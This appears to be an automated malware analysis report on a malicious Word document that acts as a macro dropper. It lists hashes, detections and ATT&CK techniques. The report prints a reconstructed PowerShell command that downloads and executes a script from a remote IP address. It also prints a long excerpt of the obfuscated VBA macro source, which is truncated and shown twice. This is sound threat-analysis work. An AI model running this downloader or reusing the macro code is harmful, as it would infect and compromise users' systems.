Office (OLE) malware analysis — malicious · 30df69feade4ca93

MALICIOUS

Office (OLE)

84.2 KB Created: 2018-06-19 17:50:00 Authoring application: Microsoft Office Word First seen: 2020-05-25

MD5: bb1c3c4c38c803e3f12c446334ccb131 SHA-1: d549a46a8f252e2396c300faab643041294ec9f0 SHA-256: 30df69feade4ca930c04d3321ba028f7a69e5f60e2b1a3cce05eac288799bd42

242 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The sample contains a VBA macro with an AutoOpen function that utilizes the Shell() command. This macro constructs and executes a PowerShell command to download and execute a script from a remote URL. The reconstructed PowerShell command is 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://185.143.223.247/a.ps1\')"'. This indicates a downloader or droppper functionality.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6586686-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6586686-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10973 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10973 bytes
SHA-256: `29bb6ad5435df5dca1bcc4fd334367bbe083c7bfee20b04e90ad8e58a141abc9`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "PXoQzwzwoUU" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "rAfOKTEGsIbEbr" Function wUDzFVOAv() On Error Resume Next VUBHK = CDate(89433) Efiwpp = CDate(QJKOC + Sin(32927 + 36308) * 69077 * CInt(84378)) BcpKDz = 36476 TArwjE = tNTjH DtDXZt = 74576 YVPCBl = CByte(FkWYc) HbAdiC = "Ow" + "erSHe" + "ll .( $PSHome[2" + "1]+$pSHOme[30" + "]+'X')( " + Chr(34) + " $" + "(SeT-varIAble" + " 'ofS' '') " + Chr(34) + "+[s" iEbVhI = CDate(42375) Vzutq = CDate(YGoUv + Sin(70282 + 60190) * 94470 * CInt(46183)) NLXBv = 48478 dvfbP = AYBSIM pptZRl = 42789 VLplc = CByte(nJCwX) TzzwPYjBLS = "Tring]( '29&" + "125" + "&110{104&111t1" + "05t25-4&25-" + "87%92%78" + "-20t86%91B83%92" + "K90-77}25<75%" rXwLV = CDate(97905) CKNLBk = CDate(AHoiOS + Sin(39029 + 28124) * 44412 * CInt(52960)) wuXnj = 39842 LzDPfZ = XvFXab VCBci = 41860 DnvhjZ = CByte(mdurmw) qFToFqsI = "88-87<93t8" + "6-84t2<29{8" + "6}114{73t87t" + "11" obdjMX = CDate(86734) SmpFB = CDate(mRtZQ + Sin(55256 + 82806) * 88728 * CInt(56232)) pLlVFJ = 44420 GwBUa = zuKAA HpsldP = 67525 BcAUfK = CByte(cmfnL) zkRiwuMB = "6<74z2" + "5K4%25{87" + "}92{78%20}8" + "6{91B83K92K90" + "-77%2" + "5<106{64&74&77" + "K9" + "2-84t23t" ouvBV = CDate(3490) Ejiwb = CDate(mKqSN + Sin(10783 + 30450) * 44700 * CInt(84043)) LPdoOK = 85207 bMGmA = cQFZj QTcTN = 99367 Winuz = CByte(aQVYq) DzIGq = "119B92<77%23K11" + "0<92{91&1" + "22&85<80B92" + "t87t77t2" + "<29&79z87&83" + "-126K109" + "<76t25K4z25z30" + "<81<77{77z73}3z" + "22%22t78z78%" wUDzFVOAv = HbAdiC + TzzwPYjBLS + qFToFqsI + zkRiwuMB + DzIGq End Function Function tvFVBjk() On Error Resume Next EOtBil = CDate(88704) pusQj = CDate(frAWb + Sin(6970 + 59412) * 57065 * CInt(14098)) YrjMjK = 93075 zAEtzn = zpzUd KEZCMI = 28119 wISafz = CByte(ToOPK) iEcoJXziGED = "78-23}93t9" + "0K20t77<92&90" + "z81t" + "23-75{76}22{10" + "5}8B85" mzCApS = CDate(4549) SUsMp = CDate(ZBXzL + Sin(20332 + 65567) * 73372 * CInt(86662)) Kvirco = 85139 kIarB = GYjjJf bwalFs = 11607 GLaHGB = CByte(hAXCqu) WOpBU = "t67" + "-120" + "<114-" + "22-121K81B77}" + "77z73&3{2" + "2}22<78B7" UjGuu = CDate(24382) AlZctn = CDate(pwAkD + Sin(79710 + 6391) * 89289 * CInt(92642)) uMZHw = 99684 JZIKSi = GPruOG MlDCsK = 31793 ijsAG = CByte(QjrKzd) bPijD = "8t78-23" + "<93z92&87&80{" + "67{92<84{8" + "5&88t82<9&15z" + "23{90{86t84}22" + "K13{92z77}" + "83{105z65t105{2" + "2<121B81t" dvMap = CDate(41147) RlABl = CDate(CGijh + Sin(83399 + 1552) * 18764 * CInt(54591)) SZbkr = 49771 Viqtqh = UpLud NAuVC = 59417 nLZjPl = CByte(ElhCw) jpEPTihMt = "77t77&73" + "B3B22" + "<22{78%78t78&23" + "<8" + "0%80{90B74B93" + "-92<8" + "5t81}80K23<86z" + "75<94t22" + "&65" + "&93%110t64&" jSfMaf = CDate(47930) VinVwi = CDate(VzjALb + Sin(23793 + 32235) * 40075 * CInt(57830)) KXwqi = 29980 hcIWE = uVvifL KJhAS = 25128 BALwM = CByte(Orwwb) jMqiAUfV = "124z" + "113B2" + "2-121t81z" + "77" + "B77" + "t73z3<22&22K78B" + "78z78<23K82&7" bdjrql = CDate(16954) BuMzHo = CDate(zCPco + Sin(94902 + 57505) * 30078 * CInt(46029)) zhattP = 97391 UdLNNH = oWOVw CIGJOL = 21673 FXCKi = CByte(zwZwi) KwicNGaUzd = "7-88%94-81" + "}88" + "K8" + "7%88-23K" + "90z86K84&" + "22t87%64}" + "110%9{10" + "4K22z12" + "1B81B77K" + "77K" KJlZsB = CDate(37189) UhnPE = CDate(cRjMO + Sin(38249 + 93322) * 61475 * CInt(95851)) Cuwwt = 20223 RHmYjA = haXBu UFwaz = 3546 qtzNL = CByte(WHzcn) Nqiojd = "73t3" + "K22K22B78t78t78" + "t23B94{76-75t7" + "6B88-87}9" + "3%9" + "0%86<23}8" + "0K87<22" TYGojL = CDate(65244) OGRtw = CDate(pWjwnq + Sin(53834 + 55070) * 45849 * CInt(37719)) FiJzi = 8575 hWiHM = hfRij ucnADJ = 58667 lNUqi = CByte(JHkPu) YQOZDjj = "<9-83-94" + "}94B91-85" + "{111B22{30" + "z23t106}73&8" + "5%80}77" hvFXo = CDate(40989) pYTtYj = CDate(WLVoiG + Sin(51464 + 24304) * 84448 * CInt(67239)) arAWmY = 74 ... (truncated)

SHA-256: 29bb6ad5435df5dca1bcc4fd334367bbe083c7bfee20b04e90ad8e58a141abc9

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "PXoQzwzwoUU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "rAfOKTEGsIbEbr"
Function wUDzFVOAv()
On Error Resume Next
VUBHK = CDate(89433)
Efiwpp = CDate(QJKOC + Sin(32927 + 36308) * 69077 * CInt(84378))
BcpKDz = 36476
TArwjE = tNTjH
DtDXZt = 74576
YVPCBl = CByte(FkWYc)
HbAdiC = "Ow" + "erSHe" + "ll .( $PSHome[2" + "1]+$pSHOme[30" + "]+'X')( " + Chr(34) + " $" + "(SeT-varIAble" + " 'ofS' '') " + Chr(34) + "+[s"
iEbVhI = CDate(42375)
Vzutq = CDate(YGoUv + Sin(70282 + 60190) * 94470 * CInt(46183))
NLXBv = 48478
dvfbP = AYBSIM
pptZRl = 42789
VLplc = CByte(nJCwX)
TzzwPYjBLS = "Tring]( '29&" + "125" + "&110{104&111t1" + "05t25-4&25-" + "87%92%78" + "-20t86%91B83%92" + "K90-77}25<75%"
rXwLV = CDate(97905)
CKNLBk = CDate(AHoiOS + Sin(39029 + 28124) * 44412 * CInt(52960))
wuXnj = 39842
LzDPfZ = XvFXab
VCBci = 41860
DnvhjZ = CByte(mdurmw)
qFToFqsI = "88-87<93t8" + "6-84t2<29{8" + "6}114{73t87t" + "11"
obdjMX = CDate(86734)
SmpFB = CDate(mRtZQ + Sin(55256 + 82806) * 88728 * CInt(56232))
pLlVFJ = 44420
GwBUa = zuKAA
HpsldP = 67525
BcAUfK = CByte(cmfnL)
zkRiwuMB = "6<74z2" + "5K4%25{87" + "}92{78%20}8" + "6{91B83K92K90" + "-77%2" + "5<106{64&74&77" + "K9" + "2-84t23t"
ouvBV = CDate(3490)
Ejiwb = CDate(mKqSN + Sin(10783 + 30450) * 44700 * CInt(84043))
LPdoOK = 85207
bMGmA = cQFZj
QTcTN = 99367
Winuz = CByte(aQVYq)
DzIGq = "119B92<77%23K11" + "0<92{91&1" + "22&85<80B92" + "t87t77t2" + "<29&79z87&83" + "-126K109" + "<76t25K4z25z30" + "<81<77{77z73}3z" + "22%22t78z78%"
wUDzFVOAv = HbAdiC + TzzwPYjBLS + qFToFqsI + zkRiwuMB + DzIGq
End Function
Function tvFVBjk()
On Error Resume Next
EOtBil = CDate(88704)
pusQj = CDate(frAWb + Sin(6970 + 59412) * 57065 * CInt(14098))
YrjMjK = 93075
zAEtzn = zpzUd
KEZCMI = 28119
wISafz = CByte(ToOPK)
iEcoJXziGED = "78-23}93t9" + "0K20t77<92&90" + "z81t" + "23-75{76}22{10" + "5}8B85"
mzCApS = CDate(4549)
SUsMp = CDate(ZBXzL + Sin(20332 + 65567) * 73372 * CInt(86662))
Kvirco = 85139
kIarB = GYjjJf
bwalFs = 11607
GLaHGB = CByte(hAXCqu)
WOpBU = "t67" + "-120" + "<114-" + "22-121K81B77}" + "77z73&3{2" + "2}22<78B7"
UjGuu = CDate(24382)
AlZctn = CDate(pwAkD + Sin(79710 + 6391) * 89289 * CInt(92642))
uMZHw = 99684
JZIKSi = GPruOG
MlDCsK = 31793
ijsAG = CByte(QjrKzd)
bPijD = "8t78-23" + "<93z92&87&80{" + "67{92<84{8" + "5&88t82<9&15z" + "23{90{86t84}22" + "K13{92z77}" + "83{105z65t105{2" + "2<121B81t"
dvMap = CDate(41147)
RlABl = CDate(CGijh + Sin(83399 + 1552) * 18764 * CInt(54591))
SZbkr = 49771
Viqtqh = UpLud
NAuVC = 59417
nLZjPl = CByte(ElhCw)
jpEPTihMt = "77t77&73" + "B3B22" + "<22{78%78t78&23" + "<8" + "0%80{90B74B93" + "-92<8" + "5t81}80K23<86z" + "75<94t22" + "&65" + "&93%110t64&"
jSfMaf = CDate(47930)
VinVwi = CDate(VzjALb + Sin(23793 + 32235) * 40075 * CInt(57830))
KXwqi = 29980
hcIWE = uVvifL
KJhAS = 25128
BALwM = CByte(Orwwb)
jMqiAUfV = "124z" + "113B2" + "2-121t81z" + "77" + "B77" + "t73z3<22&22K78B" + "78z78<23K82&7"
bdjrql = CDate(16954)
BuMzHo = CDate(zCPco + Sin(94902 + 57505) * 30078 * CInt(46029))
zhattP = 97391
UdLNNH = oWOVw
CIGJOL = 21673
FXCKi = CByte(zwZwi)
KwicNGaUzd = "7-88%94-81" + "}88" + "K8" + "7%88-23K" + "90z86K84&" + "22t87%64}" + "110%9{10" + "4K22z12" + "1B81B77K" + "77K"
KJlZsB = CDate(37189)
UhnPE = CDate(cRjMO + Sin(38249 + 93322) * 61475 * CInt(95851))
Cuwwt = 20223
RHmYjA = haXBu
UFwaz = 3546
qtzNL = CByte(WHzcn)
Nqiojd = "73t3" + "K22K22B78t78t78" + "t23B94{76-75t7" + "6B88-87}9" + "3%9" + "0%86<23}8" + "0K87<22"
TYGojL = CDate(65244)
OGRtw = CDate(pWjwnq + Sin(53834 + 55070) * 45849 * CInt(37719))
FiJzi = 8575
hWiHM = hfRij
ucnADJ = 58667
lNUqi = CByte(JHkPu)
YQOZDjj = "<9-83-94" + "}94B91-85" + "{111B22{30" + "z23t106}73&8" + "5%80}77"
hvFXo = CDate(40989)
pYTtYj = CDate(WLVoiG + Sin(51464 + 24304) * 84448 * CInt(67239))
arAWmY = 74
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.